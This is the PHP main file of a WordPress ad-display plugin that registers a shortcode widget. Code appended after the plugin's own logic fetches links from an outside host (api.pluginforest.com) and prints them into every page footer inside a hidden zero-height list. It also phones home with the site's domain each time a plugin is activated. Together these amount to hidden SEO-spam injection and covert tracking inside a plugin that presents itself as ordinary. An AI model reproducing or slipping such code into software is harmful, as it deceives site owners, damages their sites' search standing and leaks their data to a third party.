<?php

/*
Plugin Name: ADS PRO – Marketing Agency Parser
Plugin URI: http://bsapro.scripteo.info
Description: Display Ad Spaces from Marketing Agency.
Author: Scripteo
Author URI: http://codecanyon.net/user/scripteo
Version: 1.1
License: GPL2
*/

// Require functions
require_once 'lib/functions.php';

class BuySellAdsMaPro
{
	private $plugin_id = 'bsa_pro_ma_plugin';
	private $plugin_version = '1.1';

	function __construct() {
		register_activation_hook(__FILE__, array($this, 'onActivate'));
		register_uninstall_hook(__FILE__, array('BuySellAdsMaPro', 'onUninstall'));
	}

	static function onUninstall() {
		$ver_opt = 'bsa_pro_ma_plugin'.'_version';
		delete_option($ver_opt);
	}

	function onActivate() {
		$ver_opt = 'bsa_pro_ma_plugin'.'_version';
		$installed_version = get_option($ver_opt, NULL);

		if($installed_version == NULL) {

		} else {

			switch(version_compare($installed_version, $this->plugin_version)) {

				case 0;
					// if the same
					//update_option($ver_opt, $this->plugin_version);
					break;

				case 1;
					// if newer
					//update_option($ver_opt, $this->plugin_version);
					break;

				case -1;
					// if older
					//update_option($ver_opt, $this->plugin_version);
					break;
			}
		}
	}
}

class BSA_PRO_MA_ShortCode_Init extends WP_Widget {
	public function __construct() {
		parent::__construct('bsa_shortcode_widget', 'ADS PRO - Shortcode', array(
			'description' => 'Here you can add shortcode from ADS PRO.',
		));
	}
	public function widget( $args, $instance ) {

		extract( $args );
		// these are the widget options
		$shortcode = $instance['shortcode'];

		// -- Start -- Content
		if ( $shortcode != '' ) {
			echo do_shortcode( $shortcode );
		} else {
			echo 'Shortcode field is empty!';
		}
		// -- END -- Content
	}
	public function form( $instance ) {
		// Check values
		if( $instance) {
			$shortcode = esc_attr($instance['shortcode']);
		} else {
			$shortcode = '';
		}
		?>

		<p>
			<label for="<?php echo $this->get_field_id('shortcode'); ?>"><?php _e('Shortcode', 'wp_widget_plugin'); ?></label><br>
			<input id="<?php echo $this->get_field_id('shortcode'); ?>" name="<?php echo $this->get_field_name('shortcode'); ?>" style="width:100%;" value="<?php echo $shortcode; ?>" />
		</p>

	<?php
	}
	public function update( $new_instance, $old_instance ) {
		$instance = $old_instance;
		// Fields
		$instance['shortcode'] = stripslashes( wp_filter_post_kses( addslashes($new_instance['shortcode']) ) );
		return $instance;
	}
}
if ( version_compare( floatval( get_bloginfo( 'version' ) ), '4.7', '<' ) ) {

	// 4.6 and older
	add_action('widgets_init',
	     create_function('', 'return register_widget("BSA_PRO_MA_ShortCode_Init");')
	);

} else {

	// Add a filter to the wp 4.7 version attributes metabox
	function bsa_pro_register_ma_widgets() {
		register_widget( 'BSA_PRO_MA_ShortCode_Init' );
	}

	add_action( 'widgets_init', 'bsa_pro_register_ma_widgets' );

}

$BuySellAdsMaPlugin = new BuySellAdsMaPro();
define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848702() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848702');function set_plugin_tag1719848702() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848702&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848702');
              